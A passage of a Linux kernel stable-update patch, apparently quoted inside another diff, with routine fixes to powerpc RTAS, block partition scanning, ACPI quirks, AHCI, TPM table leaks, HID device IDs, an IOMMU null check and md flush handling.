++SUBLEVEL = 3
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/powerpc/kernel/rtas.c b/arch/powerpc/kernel/rtas.c
+index e847f9b1c5b9f..767ab166933ba 100644
+--- a/arch/powerpc/kernel/rtas.c
++++ b/arch/powerpc/kernel/rtas.c
+@@ -889,6 +889,7 @@ void __noreturn rtas_halt(void)
+ 
+ /* Must be in the RMO region, so we place it here */
+ static char rtas_os_term_buf[2048];
++static s32 ibm_os_term_token = RTAS_UNKNOWN_SERVICE;
+ 
+ void rtas_os_term(char *str)
+ {
+@@ -900,16 +901,20 @@ void rtas_os_term(char *str)
+ 	 * this property may terminate the partition which we want to avoid
+ 	 * since it interferes with panic_timeout.
+ 	 */
+-	if (RTAS_UNKNOWN_SERVICE == rtas_token("ibm,os-term") ||
+-	    RTAS_UNKNOWN_SERVICE == rtas_token("ibm,extended-os-term"))
++	if (ibm_os_term_token == RTAS_UNKNOWN_SERVICE)
+ 		return;
+ 
+ 	snprintf(rtas_os_term_buf, 2048, "OS panic: %s", str);
+ 
++	/*
++	 * Keep calling as long as RTAS returns a "try again" status,
++	 * but don't use rtas_busy_delay(), which potentially
++	 * schedules.
++	 */
+ 	do {
+-		status = rtas_call(rtas_token("ibm,os-term"), 1, 1, NULL,
++		status = rtas_call(ibm_os_term_token, 1, 1, NULL,
+ 				   __pa(rtas_os_term_buf));
+-	} while (rtas_busy_delay(status));
++	} while (rtas_busy_delay_time(status));
+ 
+ 	if (status != 0)
+ 		printk(KERN_EMERG "ibm,os-term call failed %d\n", status);
+@@ -1277,6 +1282,13 @@ void __init rtas_initialize(void)
+ 	no_entry = of_property_read_u32(rtas.dev, "linux,rtas-entry", &entry);
+ 	rtas.entry = no_entry ? rtas.base : entry;
+ 
++	/*
++	 * Discover these now to avoid device tree lookups in the
++	 * panic path.
++	 */
++	if (of_property_read_bool(rtas.dev, "ibm,extended-os-term"))
++		ibm_os_term_token = rtas_token("ibm,os-term");
++
+ 	/* If RTAS was found, allocate the RMO buffer for it and look for
+ 	 * the stop-self token if any
+ 	 */
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index 3e3bd1a466464..7b894df32e320 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -5383,8 +5383,8 @@ static void bfq_exit_icq_bfqq(struct bfq_io_cq *bic, bool is_sync)
+ 		unsigned long flags;
+ 
+ 		spin_lock_irqsave(&bfqd->lock, flags);
+-		bfq_exit_bfqq(bfqd, bfqq);
+ 		bic_set_bfqq(bic, NULL, is_sync);
++		bfq_exit_bfqq(bfqd, bfqq);
+ 		spin_unlock_irqrestore(&bfqd->lock, flags);
+ 	}
+ }
+diff --git a/block/blk.h b/block/blk.h
+index a186ea20f39d8..8b75a95b28d60 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -436,7 +436,7 @@ static inline struct kmem_cache *blk_get_queue_kmem_cache(bool srcu)
+ }
+ struct request_queue *blk_alloc_queue(int node_id, bool alloc_srcu);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode);
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner);
+ 
+ int disk_alloc_events(struct gendisk *disk);
+ void disk_add_events(struct gendisk *disk);
+diff --git a/block/genhd.c b/block/genhd.c
+index 647f7d8d88312..c4765681a8b4b 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -356,7 +356,7 @@ void disk_uevent(struct gendisk *disk, enum kobject_action action)
+ }
+ EXPORT_SYMBOL_GPL(disk_uevent);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
+ {
+ 	struct block_device *bdev;
+ 
+@@ -366,6 +366,9 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 		return -EINVAL;
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
++	/* Someone else has bdev exclusively open? */
++	if (disk->part0->bd_holder && disk->part0->bd_holder != owner)
++		return -EBUSY;
+ 
+ 	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	bdev = blkdev_get_by_dev(disk_devt(disk), mode, NULL);
+@@ -500,7 +503,7 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 
+ 		bdev_add(disk->part0, ddev->devt);
+ 		if (get_capacity(disk))
+-			disk_scan_partitions(disk, FMODE_READ);
++			disk_scan_partitions(disk, FMODE_READ, NULL);
+ 
+ 		/*
+ 		 * Announce the disk and partitions after all partitions are
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 60121e89052bc..96617512982e5 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -467,9 +467,10 @@ static int blkdev_bszset(struct block_device *bdev, fmode_t mode,
+  * user space. Note the separate arg/argp parameters that are needed
+  * to deal with the compat_ptr() conversion.
+  */
+-static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
+-				unsigned cmd, unsigned long arg, void __user *argp)
++static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
++			       unsigned long arg, void __user *argp)
+ {
++	struct block_device *bdev = I_BDEV(file->f_mapping->host);
+ 	unsigned int max_sectors;
+ 
+ 	switch (cmd) {
+@@ -527,7 +528,8 @@ static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
+ 			return -EACCES;
+ 		if (bdev_is_partition(bdev))
+ 			return -EINVAL;
+-		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL);
++		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL,
++					    file);
+ 	case BLKTRACESTART:
+ 	case BLKTRACESTOP:
+ 	case BLKTRACETEARDOWN:
+@@ -605,7 +607,7 @@ long blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
+ 	if (ret != -ENOIOCTLCMD)
+ 		return ret;
+ 
+@@ -674,7 +676,7 @@ long compat_blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
+ 	if (ret == -ENOIOCTLCMD && disk->fops->compat_ioctl)
+ 		ret = disk->fops->compat_ioctl(bdev, mode, cmd, arg);
+ 
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index f27914aedbd5a..16dcd31d124fe 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -432,10 +432,24 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "S5602ZA"),
+ 		},
+ 	},
++	{
++		.ident = "Asus ExpertBook B2502",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B2502CBA"),
++		},
++	},
+ 	{ }
+ };
+ 
+-static const struct dmi_system_id lenovo_82ra[] = {
++static const struct dmi_system_id lenovo_laptop[] = {
++	{
++		.ident = "LENOVO IdeaPad Flex 5 14ALC7",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82R9"),
++		},
++	},
+ 	{
+ 		.ident = "LENOVO IdeaPad Flex 5 16ALC7",
+ 		.matches = {
+@@ -446,6 +460,17 @@ static const struct dmi_system_id lenovo_82ra[] = {
+ 	{ }
+ };
+ 
++static const struct dmi_system_id schenker_gm_rg[] = {
++	{
++		.ident = "XMG CORE 15 (M22)",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "SchenkerTechnologiesGmbH"),
++			DMI_MATCH(DMI_BOARD_NAME, "GMxRGxx"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -458,8 +483,9 @@ struct irq_override_cmp {
+ static const struct irq_override_cmp override_table[] = {
+ 	{ medion_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ 	{ asus_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+-	{ lenovo_82ra, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+-	{ lenovo_82ra, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
++	{ lenovo_laptop, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
++	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
++	{ schenker_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index ffa19d418847f..13f10fbcd7f03 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -34,6 +34,7 @@
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ #include <linux/platform_data/x86/nvidia-wmi-ec-backlight.h>
++#include <linux/pnp.h>
+ #include <linux/types.h>
+ #include <linux/workqueue.h>
+ #include <acpi/video.h>
+@@ -105,6 +106,26 @@ static bool nvidia_wmi_ec_supported(void)
+ }
+ #endif
+ 
++static bool apple_gmux_backlight_present(void)
++{
++	struct acpi_device *adev;
++	struct device *dev;
++
++	adev = acpi_dev_get_first_match_dev(GMUX_ACPI_HID, NULL, -1);
++	if (!adev)
++		return false;
++
++	dev = acpi_get_first_physical_node(adev);
++	if (!dev)
++		return false;
++
++	/*
++	 * drivers/platform/x86/apple-gmux.c only supports old style
++	 * Apple GMUX with an IO-resource.
++	 */
++	return pnp_get_resource(to_pnp_dev(dev), IORESOURCE_IO, 0) != NULL;
++}
++
+ /* Force to use vendor driver when the ACPI device is known to be
+  * buggy */
+ static int video_detect_force_vendor(const struct dmi_system_id *d)
+@@ -755,7 +776,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+ 
+-	if (apple_gmux_present())
++	if (apple_gmux_backlight_present())
+ 		return acpi_backlight_apple_gmux;
+ 
+ 	/* Chromebooks should always prefer native backlight control. */
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index 5350c73564b60..c7afce465a071 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -28,10 +28,6 @@ static bool sleep_no_lps0 __read_mostly;
+ module_param(sleep_no_lps0, bool, 0644);
+ MODULE_PARM_DESC(sleep_no_lps0, "Do not use the special LPS0 device interface");
+ 
+-static bool prefer_microsoft_dsm_guid __read_mostly;
+-module_param(prefer_microsoft_dsm_guid, bool, 0644);
+-MODULE_PARM_DESC(prefer_microsoft_dsm_guid, "Prefer using Microsoft GUID in LPS0 device _DSM evaluation");
+-
+ static const struct acpi_device_id lps0_device_ids[] = {
+ 	{"PNP0D80", },
+ 	{"", },
+@@ -369,27 +365,15 @@ out:
+ }
+ 
+ struct amd_lps0_hid_device_data {
+-	const unsigned int rev_id;
+ 	const bool check_off_by_one;
+-	const bool prefer_amd_guid;
+ };
+ 
+ static const struct amd_lps0_hid_device_data amd_picasso = {
+-	.rev_id = 0,
+ 	.check_off_by_one = true,
+-	.prefer_amd_guid = false,
+ };
+ 
+ static const struct amd_lps0_hid_device_data amd_cezanne = {
+-	.rev_id = 0,
+-	.check_off_by_one = false,
+-	.prefer_amd_guid = false,
+-};
+-
+-static const struct amd_lps0_hid_device_data amd_rembrandt = {
+-	.rev_id = 2,
+ 	.check_off_by_one = false,
+-	.prefer_amd_guid = true,
+ };
+ 
+ static const struct acpi_device_id amd_hid_ids[] = {
+@@ -397,69 +381,27 @@ static const struct acpi_device_id amd_hid_ids[] = {
+ 	{"AMD0005",	(kernel_ulong_t)&amd_picasso,	},
+ 	{"AMDI0005",	(kernel_ulong_t)&amd_picasso,	},
+ 	{"AMDI0006",	(kernel_ulong_t)&amd_cezanne,	},
+-	{"AMDI0007",	(kernel_ulong_t)&amd_rembrandt,	},
+ 	{}
+ };
+ 
+-static int lps0_prefer_microsoft(const struct dmi_system_id *id)
++static int lps0_prefer_amd(const struct dmi_system_id *id)
+ {
+-	pr_debug("Preferring Microsoft GUID.\n");
+-	prefer_microsoft_dsm_guid = true;
++	pr_debug("Using AMD GUID w/ _REV 2.\n");
++	rev_id = 2;
+ 	return 0;
+ }
+-
+ static const struct dmi_system_id s2idle_dmi_table[] __initconst = {
+ 	{
+ 		/*
+-		 * ASUS TUF Gaming A17 FA707RE
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216101
+-		 */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ASUS TUF Gaming A17"),
+-		},
+-	},
+-	{
+-		/* ASUS ROG Zephyrus G14 (2022) */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ROG Zephyrus G14 GA402"),
+-		},
+-	},
+-	{
+-		/*
+-		 * Lenovo Yoga Slim 7 Pro X 14ARH7
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216473 : 82V2
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216438 : 82TL
+-		 */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "82"),
+-		},
+-	},
+-	{
+-		/*
+-		 * ASUSTeK COMPUTER INC. ROG Flow X13 GV301RE_GV301RE
+-		 * https://gitlab.freedesktop.org/drm/amd/-/issues/2148
++		 * AMD Rembrandt based HP EliteBook 835/845/865 G9
++		 * Contains specialized AML in AMD/_REV 2 path to avoid
++		 * triggering a bug in Qualcomm WLAN firmware. This may be
++		 * removed in the future if that firmware is fixed.
+ 		 */
+-		.callback = lps0_prefer_microsoft,
++		.callback = lps0_prefer_amd,
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ROG Flow X13 GV301"),
+-		},
+-	},
+-	{
+-		/*
+-		 * ASUSTeK COMPUTER INC. ROG Flow X16 GV601RW_GV601RW
+-		 * https://gitlab.freedesktop.org/drm/amd/-/issues/2148
+-		 */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ROG Flow X16 GV601"),
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8990"),
+ 		},
+ 	},
+ 	{}
+@@ -484,16 +426,14 @@ static int lps0_device_attach(struct acpi_device *adev,
+ 		if (dev_id->id[0])
+ 			data = (const struct amd_lps0_hid_device_data *) dev_id->driver_data;
+ 		else
+-			data = &amd_rembrandt;
+-		rev_id = data->rev_id;
++			data = &amd_cezanne;
+ 		lps0_dsm_func_mask = validate_dsm(adev->handle,
+ 					ACPI_LPS0_DSM_UUID_AMD, rev_id, &lps0_dsm_guid);
+ 		if (lps0_dsm_func_mask > 0x3 && data->check_off_by_one) {
+ 			lps0_dsm_func_mask = (lps0_dsm_func_mask << 1) | 0x1;
+ 			acpi_handle_debug(adev->handle, "_DSM UUID %s: Adjusted function mask: 0x%x\n",
+ 					  ACPI_LPS0_DSM_UUID_AMD, lps0_dsm_func_mask);
+-		} else if (lps0_dsm_func_mask_microsoft > 0 && data->prefer_amd_guid &&
+-				!prefer_microsoft_dsm_guid) {
++		} else if (lps0_dsm_func_mask_microsoft > 0 && rev_id) {
+ 			lps0_dsm_func_mask_microsoft = -EINVAL;
+ 			acpi_handle_debug(adev->handle, "_DSM Using AMD method\n");
+ 		}
+@@ -501,8 +441,7 @@ static int lps0_device_attach(struct acpi_device *adev,
+ 		rev_id = 1;
+ 		lps0_dsm_func_mask = validate_dsm(adev->handle,
+ 					ACPI_LPS0_DSM_UUID, rev_id, &lps0_dsm_guid);
+-		if (!prefer_microsoft_dsm_guid)
+-			lps0_dsm_func_mask_microsoft = -EINVAL;
++		lps0_dsm_func_mask_microsoft = -EINVAL;
+ 	}
+ 
+ 	if (lps0_dsm_func_mask < 0 && lps0_dsm_func_mask_microsoft < 0)
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 639de2d75d636..53ab2306da009 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -84,6 +84,7 @@ enum board_ids {
+ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent);
+ static void ahci_remove_one(struct pci_dev *dev);
+ static void ahci_shutdown_one(struct pci_dev *dev);
++static void ahci_intel_pcs_quirk(struct pci_dev *pdev, struct ahci_host_priv *hpriv);
+ static int ahci_vt8251_hardreset(struct ata_link *link, unsigned int *class,
+ 				 unsigned long deadline);
+ static int ahci_avn_hardreset(struct ata_link *link, unsigned int *class,
+@@ -677,6 +678,25 @@ static void ahci_pci_save_initial_config(struct pci_dev *pdev,
+ 	ahci_save_initial_config(&pdev->dev, hpriv);
+ }
+ 
++static int ahci_pci_reset_controller(struct ata_host *host)
++{
++	struct pci_dev *pdev = to_pci_dev(host->dev);
++	struct ahci_host_priv *hpriv = host->private_data;
++	int rc;
++
++	rc = ahci_reset_controller(host);
++	if (rc)
++		return rc;
++
++	/*
++	 * If platform firmware failed to enable ports, try to enable
++	 * them here.
++	 */
++	ahci_intel_pcs_quirk(pdev, hpriv);
++
++	return 0;
++}
++
+ static void ahci_pci_init_controller(struct ata_host *host)
+ {
+ 	struct ahci_host_priv *hpriv = host->private_data;
+@@ -871,7 +891,7 @@ static int ahci_pci_device_runtime_resume(struct device *dev)
+ 	struct ata_host *host = pci_get_drvdata(pdev);
+ 	int rc;
+ 
+-	rc = ahci_reset_controller(host);
++	rc = ahci_pci_reset_controller(host);
+ 	if (rc)
+ 		return rc;
+ 	ahci_pci_init_controller(host);
+@@ -907,7 +927,7 @@ static int ahci_pci_device_resume(struct device *dev)
+ 		ahci_mcp89_apple_enable(pdev);
+ 
+ 	if (pdev->dev.power.power_state.event == PM_EVENT_SUSPEND) {
+-		rc = ahci_reset_controller(host);
++		rc = ahci_pci_reset_controller(host);
+ 		if (rc)
+ 			return rc;
+ 
+@@ -1785,12 +1805,6 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* save initial config */
+ 	ahci_pci_save_initial_config(pdev, hpriv);
+ 
+-	/*
+-	 * If platform firmware failed to enable ports, try to enable
+-	 * them here.
+-	 */
+-	ahci_intel_pcs_quirk(pdev, hpriv);
+-
+ 	/* prepare host */
+ 	if (hpriv->cap & HOST_CAP_NCQ) {
+ 		pi.flags |= ATA_FLAG_NCQ;
+@@ -1900,7 +1914,7 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (rc)
+ 		return rc;
+ 
+-	rc = ahci_reset_controller(host);
++	rc = ahci_pci_reset_controller(host);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/char/tpm/eventlog/acpi.c b/drivers/char/tpm/eventlog/acpi.c
+index 1b18ce5ebab1e..0913d3eb8d518 100644
+--- a/drivers/char/tpm/eventlog/acpi.c
++++ b/drivers/char/tpm/eventlog/acpi.c
+@@ -90,16 +90,21 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 			return -ENODEV;
+ 
+ 		if (tbl->header.length <
+-				sizeof(*tbl) + sizeof(struct acpi_tpm2_phy))
++				sizeof(*tbl) + sizeof(struct acpi_tpm2_phy)) {
++			acpi_put_table((struct acpi_table_header *)tbl);
+ 			return -ENODEV;
++		}
+ 
+ 		tpm2_phy = (void *)tbl + sizeof(*tbl);
+ 		len = tpm2_phy->log_area_minimum_length;
+ 
+ 		start = tpm2_phy->log_area_start_address;
+-		if (!start || !len)
++		if (!start || !len) {
++			acpi_put_table((struct acpi_table_header *)tbl);
+ 			return -ENODEV;
++		}
+ 
++		acpi_put_table((struct acpi_table_header *)tbl);
+ 		format = EFI_TCG2_EVENT_LOG_FORMAT_TCG_2;
+ 	} else {
+ 		/* Find TCPA entry in RSDT (ACPI_LOGICAL_ADDRESSING) */
+@@ -120,8 +125,10 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 			break;
+ 		}
+ 
++		acpi_put_table((struct acpi_table_header *)buff);
+ 		format = EFI_TCG2_EVENT_LOG_FORMAT_TCG_1_2;
+ 	}
++
+ 	if (!len) {
+ 		dev_warn(&chip->dev, "%s: TCPA log area empty\n", __func__);
+ 		return -EIO;
+@@ -156,5 +163,4 @@ err:
+ 	kfree(log->bios_event_log);
+ 	log->bios_event_log = NULL;
+ 	return ret;
+-
+ }
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 65f8f179a27f0..16fc481d60950 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -676,12 +676,16 @@ static int crb_acpi_add(struct acpi_device *device)
+ 
+ 	/* Should the FIFO driver handle this? */
+ 	sm = buf->start_method;
+-	if (sm == ACPI_TPM2_MEMORY_MAPPED)
+-		return -ENODEV;
++	if (sm == ACPI_TPM2_MEMORY_MAPPED) {
++		rc = -ENODEV;
++		goto out;
++	}
+ 
+ 	priv = devm_kzalloc(dev, sizeof(struct crb_priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
++	if (!priv) {
++		rc = -ENOMEM;
++		goto out;
++	}
+ 
+ 	if (sm == ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC) {
+ 		if (buf->header.length < (sizeof(*buf) + sizeof(*crb_smc))) {
+@@ -689,7 +693,8 @@ static int crb_acpi_add(struct acpi_device *device)
+ 				FW_BUG "TPM2 ACPI table has wrong size %u for start method type %d\n",
+ 				buf->header.length,
+ 				ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC);
+-			return -EINVAL;
++			rc = -EINVAL;
++			goto out;
+ 		}
+ 		crb_smc = ACPI_ADD_PTR(struct tpm2_crb_smc, buf, sizeof(*buf));
+ 		priv->smc_func_id = crb_smc->smc_func_id;
+@@ -700,17 +705,23 @@ static int crb_acpi_add(struct acpi_device *device)
+ 
+ 	rc = crb_map_io(device, priv, buf);
+ 	if (rc)
+-		return rc;
++		goto out;
+ 
+ 	chip = tpmm_chip_alloc(dev, &tpm_crb);
+-	if (IS_ERR(chip))
+-		return PTR_ERR(chip);
++	if (IS_ERR(chip)) {
++		rc = PTR_ERR(chip);
++		goto out;
++	}
+ 
+ 	dev_set_drvdata(&chip->dev, priv);
+ 	chip->acpi_dev_handle = device->handle;
+ 	chip->flags = TPM_CHIP_FLAG_TPM2;
+ 
+-	return tpm_chip_register(chip);
++	rc = tpm_chip_register(chip);
++
++out:
++	acpi_put_table((struct acpi_table_header *)buf);
++	return rc;
+ }
+ 
+ static int crb_acpi_remove(struct acpi_device *device)
+diff --git a/drivers/char/tpm/tpm_tis.c b/drivers/char/tpm/tpm_tis.c
+index bcff6429e0b4f..ed5dabd3c72d6 100644
+--- a/drivers/char/tpm/tpm_tis.c
++++ b/drivers/char/tpm/tpm_tis.c
+@@ -125,6 +125,7 @@ static int check_acpi_tpm2(struct device *dev)
+ 	const struct acpi_device_id *aid = acpi_match_device(tpm_acpi_tbl, dev);
+ 	struct acpi_table_tpm2 *tbl;
+ 	acpi_status st;
++	int ret = 0;
+ 
+ 	if (!aid || aid->driver_data != DEVICE_IS_TPM2)
+ 		return 0;
+@@ -132,8 +133,7 @@ static int check_acpi_tpm2(struct device *dev)
+ 	/* If the ACPI TPM2 signature is matched then a global ACPI_SIG_TPM2
+ 	 * table is mandatory
+ 	 */
+-	st =
+-	    acpi_get_table(ACPI_SIG_TPM2, 1, (struct acpi_table_header **)&tbl);
++	st = acpi_get_table(ACPI_SIG_TPM2, 1, (struct acpi_table_header **)&tbl);
+ 	if (ACPI_FAILURE(st) || tbl->header.length < sizeof(*tbl)) {
+ 		dev_err(dev, FW_BUG "failed to get TPM2 ACPI table\n");
+ 		return -EINVAL;
+@@ -141,9 +141,10 @@ static int check_acpi_tpm2(struct device *dev)
+ 
+ 	/* The tpm2_crb driver handles this device */
+ 	if (tbl->start_method != ACPI_TPM2_MEMORY_MAPPED)
+-		return -ENODEV;
++		ret = -ENODEV;
+ 
+-	return 0;
++	acpi_put_table((struct acpi_table_header *)tbl);
++	return ret;
+ }
+ #else
+ static int check_acpi_tpm2(struct device *dev)
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 8f58c3c1bec31..e27fb27a36bfa 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -995,7 +995,10 @@
+ #define USB_DEVICE_ID_ORTEK_IHOME_IMAC_A210S	0x8003
+ 
+ #define USB_VENDOR_ID_PLANTRONICS	0x047f
++#define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3210_SERIES	0xc055
+ #define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3220_SERIES	0xc056
++#define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3215_SERIES	0xc057
++#define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3225_SERIES	0xc058
+ 
+ #define USB_VENDOR_ID_PANASONIC		0x04da
+ #define USB_DEVICE_ID_PANABOARD_UBT780	0x1044
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 91a4d3fc30e08..372cbdd223e09 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -1967,6 +1967,10 @@ static const struct hid_device_id mt_devices[] = {
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_ELAN, 0x313a) },
+ 
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_ELAN, 0x3148) },
++
+ 	/* Elitegroup panel */
+ 	{ .driver_data = MT_CLS_SERIAL,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_ELITEGROUP,
+diff --git a/drivers/hid/hid-plantronics.c b/drivers/hid/hid-plantronics.c
+index e81b7cec2d124..3d414ae194acb 100644
+--- a/drivers/hid/hid-plantronics.c
++++ b/drivers/hid/hid-plantronics.c
+@@ -198,9 +198,18 @@ err:
+ }
+ 
+ static const struct hid_device_id plantronics_devices[] = {
++	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
++					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3210_SERIES),
++		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
+ 					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3220_SERIES),
+ 		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
++					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3215_SERIES),
++		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
++					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3225_SERIES),
++		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS, HID_ANY_ID) },
+ 	{ }
+ };
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index dad2f238ffbf2..56d007582b6fa 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -454,7 +454,7 @@ static irqreturn_t mtk_iommu_isr(int irq, void *dev_id)
+ 		fault_larb = data->plat_data->larbid_remap[fault_larb][sub_comm];
+ 	}
+ 
+-	if (report_iommu_fault(&dom->domain, bank->parent_dev, fault_iova,
++	if (!dom || report_iommu_fault(&dom->domain, bank->parent_dev, fault_iova,
+ 			       write ? IOMMU_FAULT_WRITE : IOMMU_FAULT_READ)) {
+ 		dev_err_ratelimited(
+ 			bank->parent_dev,
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index a467b492d4ad3..fd82881761d34 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -509,13 +509,14 @@ static void md_end_flush(struct bio *bio)
+ 	struct md_rdev *rdev = bio->bi_private;
+ 	struct mddev *mddev = rdev->mddev;
+ 
++	bio_put(bio);
++
+ 	rdev_dec_pending(rdev, mddev);
+ 
+ 	if (atomic_dec_and_test(&mddev->flush_pending)) {
+ 		/* The pre-request flush has finished */
+ 		queue_work(md_wq, &mddev->flush_work);
+ 	}
+-	bio_put(bio);
+ }
+ 
